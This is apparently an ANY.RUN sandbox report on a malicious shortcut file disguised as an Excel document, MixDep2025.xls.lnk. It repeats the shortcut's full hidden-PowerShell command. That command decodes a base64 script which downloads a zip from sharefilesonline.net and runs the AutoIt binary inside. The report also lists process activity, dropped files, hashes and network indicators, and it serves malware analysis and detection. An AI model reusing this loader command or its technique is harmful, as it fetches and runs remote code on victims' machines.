download:

/Downloads/MixDep2025.xls.lnk

Full analysis: https://app.any.run/tasks/fa2288b4-3759-4f54-acb3-a0b31d2a5d4e
Verdict: Malicious activity
Analysis date: March 15, 2025, 23:43:55
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
autoit
susp-powershell
arch-exec
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Unicoded, Archive, ctime=Tue Dec 17 10:41:13 2024, atime=Wed Feb 26 17:06:33 2025, mtime=Tue Dec 17 10:41:13 2024, length=245760, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe"
MD5:

27BC8CF12690AEC8DF78B3CF6E298B63

SHA1:

F3C1A714DEE2413A97F5FA0588A90B84A6A95E5C

SHA256:

65729A2AC815D385EAE0EC53CB58EDC12BC915AC81BF7AA40D48B06029F2E243

SSDEEP:

48:8s5JeDTsA2A3TlYPXqhMkClF66VUAv0BhQGuP:8sL59A3G/qh3Cn9R3R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4560)

  • SUSPICIOUS

    • Possibly malicious use of IEX has been detected

      • cmd.exe (PID: 660)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 660)
      • cmd.exe (PID: 8044)

    • Extracts files to a directory (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Starts the AutoIt3 executable file

      • powershell.exe (PID: 4560)

    • Reads security settings of Internet Explorer

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • Starts CMD.EXE for commands execution

      • a.exe (PID: 7904)

    • Gets file extension (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Potential Corporate Privacy Violation

      • a.exe (PID: 7904)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 4560)

    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4560)

    • Sets XML DOM element text (SCRIPT)

      • splwow64.exe (PID: 7932)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 4560)
      • BackgroundTransferHost.exe (PID: 7872)
      • a.exe (PID: 7904)
      • slui.exe (PID: 7232)

    • The sample compiled with english language support

      • powershell.exe (PID: 4560)

    • Reads mouse settings

      • a.exe (PID: 7904)

    • Reads the computer name

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • The executable file from the user directory is run by the Powershell process

      • a.exe (PID: 7904)

    • Checks supported languages

      • a.exe (PID: 7904)
      • ShellExperienceHost.exe (PID: 8168)

    • Reads the software policy settings

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)
      • slui.exe (PID: 7396)
      • slui.exe (PID: 7232)

    • Reads the machine GUID from the registry

      • a.exe (PID: 7904)

    • Found Base64 encoded file access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • conhost.exe (PID: 780)
      • powershell.exe (PID: 4560)

    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • conhost.exe (PID: 780)
      • powershell.exe (PID: 4560)

    • Found Base64 encoded network access via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)

    • Creates files or folders in the user directory

      • a.exe (PID: 7904)
      • BackgroundTransferHost.exe (PID: 7872)

    • Creates files in the program directory

      • a.exe (PID: 7904)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • cmd.exe (PID: 660)
      • powershell.exe (PID: 4560)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8092)

    • Disables trace logs

      • powershell.exe (PID: 4560)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 8052)
      • BackgroundTransferHost.exe (PID: 536)
      • splwow64.exe (PID: 7932)
      • BackgroundTransferHost.exe (PID: 8064)
      • BackgroundTransferHost.exe (PID: 7872)
      • BackgroundTransferHost.exe (PID: 3140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, LinkInfo, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode
FileAttributes: Archive
CreateDate: 2024:12:17 10:41:13+00:00
AccessDate: 2025:02:26 17:06:33+00:00
ModifyDate: 2024:12:17 10:41:13+00:00
TargetFileSize: 245760
IconIndex: (none)
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: cmd.exe
DriveType: Fixed Disk
DriveSerialNumber: D408-2CA4
VolumeLabel: -
LocalBasePath: C:\Windows\System32\cmd.exe
Description: Document Shortcut
RelativePath: ..\..\..\..\..\..\..\..\Windows\System32\cmd.exe
WorkingDirectory: C:\Users\Work\Desktop
CommandLineArguments: /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"
IconFileName: .\Document.xls
MachineID: desktop-8cluclv
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
160
Monitored processes
20
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe no specs conhost.exe no specs powershell.exe sppextcomobj.exe no specs slui.exe excel.exe a.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs slui.exe splwow64.exe no specs shellexperiencehost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
536"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
660"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
780\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2108C:\WINDOWS\system32\cmd.exe /c python.exe logo.pngC:\Windows\SysWOW64\cmd.exea.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
3140"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
4560powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHRlbXA9W1N5c3RlbS5JTy5QYXRoXTo6R2V0VGVtcFBhdGgoKTskZG9jdW1lbnRzPVtTeXN0ZW0uRW52aXJvbm1lbnRdOjpHZXRGb2xkZXJQYXRoKCdNeURvY3VtZW50cycpO0ludm9rZS1XZWJSZXF1ZXN0IC1VcmkgJ2h0dHBzOi8vc2hhcmVmaWxlc29ubGluZS5uZXQvTWl4RGVwMjAyNS54bHN4JyAtT3V0RmlsZSAiJGRvY3VtZW50c1xNaXhEZXAyMDI1Lnhsc3giO1N0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICIkZG9jdW1lbnRzXE1peERlcDIwMjUueGxzeCI7SW52b2tlLVdlYlJlcXVlc3QgLVVyaSAnaHR0cHM6Ly9zaGFyZWZpbGVzb25saW5lLm5ldC9lcncuemlwJyAtT3V0RmlsZSAiJHRlbXBcZXJ3LnppcCI7QWRkLVR5cGUgLUFzc2VtYmx5TmFtZSBTeXN0ZW0uSU8uQ29tcHJlc3Npb24uRmlsZVN5c3RlbTtbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiR0ZW1wXGVydy56aXAiLCAkdGVtcCk7U3RhcnQtUHJvY2VzcyAtRmlsZVBhdGggIiR0ZW1wXGEuZXhlIiAtQXJndW1lbnRMaXN0ICIkdGVtcFxQLmEzeCIgLU5vTmV3V2luZG93IC1XYWl0DQojIEJSQUJVUw0K')) | Invoke-Expression"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
7232C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7352C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Exit code:
0
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
7396"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
Total events
22 078
Read events
21 792
Write events
258
Delete events
28

Modification events

(PID) Process:(4560) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.xlsx\OpenWithProgids
Operation:writeName:Excel.Sheet.12
Value:
(PID) Process:(4560) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
Operation:writeName:{33154C99-BF49-443D-A73C-303A23ABBE97} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF
Value:
01000000000000006781EC240496DB01
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation:writeName:0
Value:
0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ImmersiveWorkbookDirtySentinel
Value:
0
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel
Operation:writeName:ExcelPreviousSessionId
Value:
{4E72B0C1-8BFD-40D1-8DA3-0125C337E10A}
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
Operation:writeName:SessionId
Value:
07D870B5DA07B04A93253D1C3561FE2C
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation:delete valueName:0
Value:
ซ洐郘Ꙏ蒢㗷ⅾ䛢꿸놜樁င$驄摽鶲…ީ湕湫睯쥮Ȇ∢්łᣂ숁씀褎예錏�菈Ǭ჉砃㐶ᇅ⪔ዒ攉砀挀攀氀⸀攀砀攀씀‖ៅ肀줄࠘㈲㈱䐭捥
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\GracefulExit\EXCEL\5396
Operation:delete keyName:(default)
Value:
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\7404
Operation:writeName:0
Value:
0B0E10C1B0724EFD8BD1408DA30125C337E10A230046B8B4F3E5C2C0E5ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C50E8908C91003783634C511EC39D2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300
(PID) Process:(7404) EXCEL.EXEKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:1
Value:
01D014000000001000B24E9A3E02000000000000000600000000000000
Executable files
2
Suspicious files
32
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
4560powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vg2lbo5b.3r3.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4560powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_35e1cm30.30q.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4560powershell.exeC:\Users\admin\AppData\Local\Temp\a.exeexecutable
MD5:0ADB9B817F1DF7807576C2D7068DD931
SHA256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
7404EXCEL.EXEC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04binary
MD5:24C438E1815168D7C69BCD38BB1769E9
SHA256:664CF51B4675D6C60B558CC395C18E48B7AB2A291301640E57B35D98922EA06F
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rrykrgzk.mr5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_eksr4kf2.ih5.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8092powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4lhrpwbe.emh.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7904a.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E573CDF4C6D731D56A665145182FD759_5A9FE11E8B6335FDA91281200971E038binary
MD5:7F0525EE34A50264F40D46AE38892261
SHA256:90BA8E37400741BA055982EBD0438D5C0F8A4391A7EDA506DB1636D42DA5BBBC
7872BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f92f0722-10a8-4bab-855f-c9a8a91455c6.down_data
MD5:
SHA256:
8092powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:F54FDADC9900FD94CC5F9A7946274488
SHA256:646754D111C361288D476AA34EB9C31F1BAE273D1C44EFE8843ECC3E8FAE3711
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
39
DNS requests
28
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
2148
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
7904
a.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
whitelisted
7904
a.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTk45WiKdPUwcMf8JgMC07ACYqr2AQUt2ui6qiqhIx56rTaD5iyxZV2ufQCEAyVRp0LO%2F899HuOUNmwbkY%3D
unknown
whitelisted
7404
EXCEL.EXE
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEApDqVCbATUviZV57HIIulA%3D
unknown
whitelisted
7724
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7872
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7724
SIHClient.exe
GET
200
23.219.150.101:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7404
EXCEL.EXE
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA77flR%2B3w%2FxBpruV2lte6A%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
6544
svchost.exe
40.126.32.136:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
3216
svchost.exe
40.115.3.253:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
5496
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4560
powershell.exe
66.248.206.135:443
sharefilesonline.net
Hostkey B.v.
NL
unknown
7904
a.exe
162.125.66.18:443
www.dropbox.com
DROPBOX
DE
whitelisted
7904
a.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.164
whitelisted
google.com
  • 142.250.185.174
whitelisted
login.live.com
  • 40.126.32.136
  • 20.190.160.20
  • 40.126.32.140
  • 40.126.32.134
  • 20.190.160.5
  • 20.190.160.130
  • 40.126.32.74
  • 20.190.160.66
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 2.23.77.188
whitelisted
client.wns.windows.com
  • 40.115.3.253
whitelisted
sharefilesonline.net
  • 66.248.206.135
unknown
www.dropbox.com
  • 162.125.66.18
whitelisted
arc.msn.com
  • 20.223.36.55
whitelisted
officeclient.microsoft.com
  • 52.109.28.46
whitelisted

Threats

PID
Process
Class
Message
7904
a.exe
Potential Corporate Privacy Violation
ET INFO Dropbox.com Offsite File Backup in Use
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/Downloads/MixDep2025.xls.lnk